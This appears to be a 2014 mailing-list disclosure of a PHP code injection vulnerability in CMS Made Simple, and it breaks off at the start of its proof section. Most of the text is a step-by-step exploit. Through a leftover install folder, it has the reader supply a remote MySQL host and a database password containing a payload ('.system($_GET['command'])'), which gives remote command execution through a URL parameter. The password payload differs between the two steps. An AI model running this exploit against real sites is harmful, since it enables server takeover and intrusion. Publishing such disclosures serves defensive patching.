[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

CMS Made Simple PHP Code Injection Vulnerability (All versions)



# CMS Made Simple PHP Code Injection Vulnerability (All versions)
# 2014-12-02
# SAHM (@post.com)
# cmsmadesimple.org
# All versions
---exploit
A malicious attacker can intrude every CMSMS-installed website by taking the following steps:
  Open the /install folder from the URL (The cms doesn't force users to delete the directory after finishing the installation progress).
    Ex: http://URL/PATH/install
  Pass through the steps to get to the fifth step.
    In a remote host, install a MySQL server and create the following user:
        user: test
        password : '.passthru($_GET['command']);exit;//
    Following that, Create a remotely accessible database and grant all privileges to the user (for further information please read : http://www.cyberciti.biz/tips/how-do-i-enable-remote-access-to-mysql-database-server.html) .
  Fill in the Database Information form (bottom of the page).
    db host address: the remote host's IP
    user: test
    password: '.system($_GET['command']);exit;//
    database name: the name of the remote database which has been built
  After installation, commands can be injected as:
    http://URL/PATH?command=blah%20blah
---prove
At this point, the config.php file content would be something like this:
<?php
# CMS Made Simple Configuration File
# Documentation: /doc/CMSMS_config_reference.pdf
#